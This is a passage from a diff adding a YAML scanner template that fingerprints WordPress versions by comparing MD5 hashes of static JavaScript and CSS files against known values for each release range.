md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"fc378b756c507156d3bb57647a2fa305\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e7ffb528925a345287bf91fc1bfdc48c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"db814e86353b29081bab44e9ce633780\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"72e43256343bd24f7f7b1c84d911f752\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/nux.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ea02e17cc487eecd2c884730ca83d19f\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"4da60c791df64a2f136d684b8c6a094c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"92e4b04f1c3861f31bd7f3dd7a3b7afe\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"79fb8c5a535be1a6085cef841c12a1bc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5e3a8dd193aba379149ae58ff4fcb7ad\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d01744b1e9eeb486e13f6e967d8e9adb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"11453aa4f082dfb12090aa6a8134f083\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2306679567a599c1866e706a06a76670\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keycodes.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ca4ed904bbcce34e6346622f492a09b3\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"8984f96477ccd220c22d2798088414d1\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a4e82399a30c4e01d4ce7f1df5f8e6be\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b29b25b69e966f8e7d01ff3b0c33e487\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"17a7829459e9f1c0f0e9b623540b7e45\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8716957bb6d1b8fa50784c1c106a3eee\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - 
"(\"46cfbd1159b79fe5d623a7c4d69a215d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b3366fcfca15614a0632efa733534acd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-widgets.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"038311fc7ba902f635d38d5856e4bd5f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"06e1b9a8b892c70e1c85d6e71a818042\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"76e8fb3ef4bfc708d61dc8d384d15741\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"05121399e2e350d408b130348c895376\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4238613e5d0aac83303ec318675cb1f6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8969a60a3f0c741d9afea447d86d953d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ef95bf9c8588420084c724b541ec9fa0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"04051a3d44556bfa47c141f3dbbcf574\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e4253b068d2423298be9024de455ce7a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5f456c32cef0c2d26594029014e40121\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"2724ee570a2716c8a7ad0436cb541e7c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6da061fdd986c81610bab6ce0da32829\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"23e2b245228cfee7192b5a3fe31c0c91\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ffd7aec63852caff436bc285577ecfa3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5e266e3c53ef66ec3fb3b5056f8b2089\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"41d27e52426e99a7d3266032ee77e1a6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"af50c512cb7c67e0ed118e63c7453e4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-widgets.js" + 
matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"fd98bf4be88830825dc122dd0175408e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"da08d3e88ee6525511da0ca1518fef08\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0aeb0d45bad4619ea1eaa727f841a356\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ed7f5302d5bae6a9b6cd5a4d43bf78a9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2a2b605aaa66b094f21ccad9f81f6967\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"abb5c6059429946e6df1524a068934ac\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"07f1519a2a074eb51cce3ec5cb9810d5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7850d87d05e8fce2ef72aa1dd954dc63\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"30816d081b666a1ac06ccca7bd335458\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ac59c76760d66a4135e7c66862b29de3\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e92d16056260b9b00ff62ba8cf8ac956\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1138fc4ff0186ab65c201c1406c5488c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bc8ac6899320067cd086f03667306ecf\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2538bc7069ff25eba18dad8e31909458\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9397c78bbf00b486338b2b41d0749790\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f9f2d84bc27487c539cb01d6daad844b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d11098c05c2c0c794985feecc744d761\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog-rtl.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"10939ff6a3629fba80e30e2e7c526901\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f4012995712fc1a153c6be91b0793944\" == md5(body))" + - 
type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"81df1614adc93799fc9fd6b4b81c4633\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c28f6757fb9b072ed4ec796a96321e67\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"094685fe088942cb4b6c7dc87baea22f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4022062aa680d97c19101657ee855ab4\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f805ee14b012822046c39857720dada6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"927ba792f9f6603f5f8906f6084d50a6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"61d8a3d3a6d658c14b3af6df9867c814\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c6a6c86e7744eb9a44a85c796a2ee495\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"eeabb4ac70cad56aa0cadcd62a03d1af\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"61f6e02f97dc44c4e4f40edb42eff799\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ab51971b54ae780e5f7c6435241f384a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e845c325df4406c4f802e9a91156e27f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f330e24b85f0fa9184d3ce6ab3be05f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"d2bb91a5e175182fd98b92423245b886\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ab5cf43a981c0b4dcf4ca2812302dc6d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"34105bf7fc640687204120141bae58c9\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"cc328e9ddbef2ef2c495786078ff612a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"376c100428103201b7109877a4afebae\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"48e4569b0d88ef4dc74f9fab6949dca3\" == md5(body))" + - type: dsl + name: 3.9 - 
3.9.33 + dsl: + - "(\"cc920c884e073e24a57c407bf3f3e9dc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"619351c3cdeabdd4ee466e303fade708\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"680ce200631f3e5cea718914a27f2b20\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"396d215094f1db66ef590df9ad2b58ef\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e5fdc24406fc3ac9f77cd9fdd04efde7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"14180fbee1fff1db3412989150c0443b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c851fc6fbe4274e4e2bf73b2100a2f96\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cabcd80e41e666e442604997c371fde5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4d39482cc996c858ca9d2a1bdf67e31a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/redux-routine.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9edcaa09dfed88e54fbca308bfd5bd30\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c16dec7246230269b58a03a97307c259\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7a44fe509e3d08f766318638d81fa55d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8923ea20eee433c28a5d36f3e07dd5a5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0b2140c841b390907f4b88653b85bd22\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c8c2c6241f51ea5d30d1bbeb3505596a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7066d794b635c1942e8eb7f239f1ffbc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/deprecated.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9d288327c3cc35f46ee387ac35ce33d2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2d6c78a8d8b0ff36f60a59959389ea06\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - 
"(\"bb93233b0856b933d5fed37eed889fc6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6b4d9b1bb83a32e0584a2d96813914d4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"806f3624fe3764b82839575ba0d78215\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8bd3f05802ff45dbb7caefe74ca9ac19\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"15d004e2a497bbb3415df4841ee3c287\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/html-entities.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6bc5679d9554f610fa802a700e4d2bb0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"add6f47cfd2143dc9b8ce1cf9d61fa1d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e83cc08139f59d9c7b2a844d0f157ae6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"926549c2345d841c4e9aa846b47faf66\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"704aa3f780a4be1c5e1cdec6d12ebd58\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5e372785534afd708ecd06137104fd7a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3d019746602830edc76606593c6e78cb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/html-entities.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5653e616ff072597049a986e94d1893d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"17a814289573e3266ce50763ba3d96e9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4e1093a0eb3233815ff119a59aa3da12\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f9ac946bd43269e5d0096b2885a452c4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ab30525b5a3d41679c37ceb0391da9b2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c3460934c084a6f5ad1d6067ef4cf601\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"24ba24df2ddcd1a3ece0d53120599d70\" == md5(body))" 
+ - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/redux-routine.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a6f2946ff5131fb4149a5e31c1ef1620\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0cd45abb1d29b859766855e38ae523a6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7afef25c194892b0cd2daa36dfcdcf2f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"330b275564eb0285afa4e176f92db068\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"cbf969c81590775351bdf3cbdb23dd8c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c8f64648dc07f6d88806eecf3f1d9171\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"265e120fcc08fd1d71c00b054c2ad6b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom-ready.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9cdf2bc4e52829d46923c46a0c51b3d8\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"afeaf9138fd850772f230e0a45c88b17\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"362658e6685350fbd7085f492d41d2f0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"23250a9a6c2af1c80138657bc6580c75\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"cac6d5949b7c62e50ef4796c14190413\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3bacceecaca0f8a589dc42aa0b20bc4b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"623e83c4d16c6e8b4cbfc39fad5eb250\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/is-shallow-equal.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"0ddf6ee2668f5c4bd3c1d2d6cab397b4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0fd621a526a3a22c990811e7f2452d00\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e6344716ad60939b279e71b39177359a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"5b6f24bca1ae714a09544545ecfa0591\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"62ad08977c7726bdecc27a2c5aae90aa\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"91a430c2d47f62111ad1dcef49602378\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"697dc948d7154a4de8dc89ff1eedc666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/compose.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d8938753827f30dbd34f1383cd339fff\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3ec226880c9c7b212bea4e6b28bef494\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"48303ce765732dd6dec6002e9fb6c2b6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"98dfd710199c77e9af13f78f26aa2ec9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"91b64fc6a91c5a07074f910510359d7a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c011e24785102d27ae0303584fbd7f61\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c184f3a2648f4987470720f06836ed95\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/notices.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"17eeb174de4dc2cbbab3f4df5033d860\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"deb21fd1f49c4b7273ed16e27d1bdfb6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"57ec282267670a8099098c610c266afe\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"87401eac0344e7ccccf68ae898454158\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"76bbcc43a04f458c5de0bcdda3b6b2d2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ca0f216ae346da85031c47117c5110fd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6347a5cc8ba70c6c00153843d0fe33c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/notices.js" + matchers: + - type: dsl + name: 5.0 
- 5.0.11 + dsl: + - "(\"a97eec74d9c0c50bf12be932ba1cc303\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb9b574dc9c6e136ef09ffffa8866b67\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"57f535968b993b74aaee4b2d6fc6b465\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5f1bee3c68fcb07418306a2010736746\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"15c08b66b7ff4019c5402d3d897ad52f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b164f09a93d3c5f52db6a7c6de3badb2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6b507c26a7c8df25e48ab5c68124fda5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/is-shallow-equal.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6f7824784191e6d2ce34292fd3b000af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4784dae40cdab3b3843ba1d7f8604705\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"648aa419fdf18a5ab737dbbcd83c4201\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8a86cb6d7546fd3f89a1f5109c476a88\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c3d623f7027e378ad1acb574cc1eb2e8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6f786f55902f42d508158386097b0e7d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ced4b8cb966fdeb10870053a7158eca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/shortcode.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"40ed11fa6412995d2b8ec4668c512957\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8abc986b209c75fe69057f95edc3df78\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9fd866d09fc09024aac82a01af9c2b04\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e096abf3375c18cd3c6842e92473d413\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 
"(\"bc0717f0b100c9a56ae85fd646445118\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"689da769b1b1e825af1aed70cf3ac27e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0c4bc0b7e6a7ee652d67338ee99b323c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/shortcode.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a78dedde748a70dc816381eefe608b72\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"70c91757d9cbf18b992d6d42f463ff7f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4cc94e39247daee4a2000aa3503ff215\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ac3c48115c0205965fc697211684458d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"085c0f540b7b3e70c084e4070b5b1b63\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4f5a03618073955d601159a6331ceaa6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"27f796c850d855e7a672386faa79605f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/wordcount.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6cbedf2a939d33d895dca7b7a41ce749\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"761f62febb42875b72bc681607e28c49\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ef5f88e073dfcb14615a7037ebd14d5a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f3719a4599c7a08452fc41ade441733a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1f80397cdd7cb373f7b8bf278857fabb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f20f637e974b45fb265d1d442f2a96cf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6cd42d81392ca9a1275e5929b219cb3e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/plugins.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8b7c6306e6af8cc0a9c0976463e72291\" == md5(body))" + - type: dsl + 
name: 5.1 - 5.1.8 + dsl: + - "(\"4e4cafec091c6f0f0b05f94b9bce2344\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"16c85d6dab8967f3ba89b82bfbd64b9c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5c33e1efc8af44769e3d823c939e08ab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dfa7cb95b973bebb10f975b2c1143880\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d68b321a54cbc9d93cb151250f4c551b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b3a531b04ae8c7a60aa0844b668d2d3e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/compose.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"84a24df5fd7511a645e0cc57c571a25e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"39c3ea51be78c24e6b576cd61f9cfc15\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"45a96c9d47bae98f108e64e2b2a66270\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"90a33c0e9b6ef96958972ca75e65f7bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a302e6d75222f9aa699a02cf71f9d7b3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"dce767e630974837137c498073100cc5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"edc09213e8efe783bc66b3b0f7cc4e9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/token-list.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"0d97e2a44480fb98f1b04861ae5afc6b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"867f84b6f025f1123314735f577dc382\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"42ad764acc204932657d4a003ba53c9f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1a954120fc762886e2f75c39f83186c5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"63fb45908530ce527b962cc621b05230\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - 
"(\"9961c5f25ac509cf7cb40e68468841e3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4a5239779fc4eca6d020f55604ab0c47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/plugins.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cf2c44c23fcccdac64b0f533764e7a57\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6822b991e921f7b612c7f1561c8aecfe\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"82268e20e6668545503caccea9e48fe2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"be44053c6cf3cf00096ca0f61d1054d2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"733acdbecefa13189f9646eb0b7ea527\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f09ad846838e615fd9a379d3ff329c3b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"01651f0a9c050441e177a705582f10ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/token-list.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa95d2cbba56cee9e4c478aae1b495c5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9cc3df074bb2ee5a0f3ce49aff4d493e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ba25522bb908454e432fcb29b1992578\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"94af1e6e3c4a621d920bd15056ecd6df\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"61fce867969f5649b390d339b8fcc48c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fdff31d347d9aee423ea3a5b8f776b7b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9d837b1c5a73f565fe3c241cfeb7dfcc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/escape-html.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"57fb61bedd534ef3dd8c47e40db28211\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 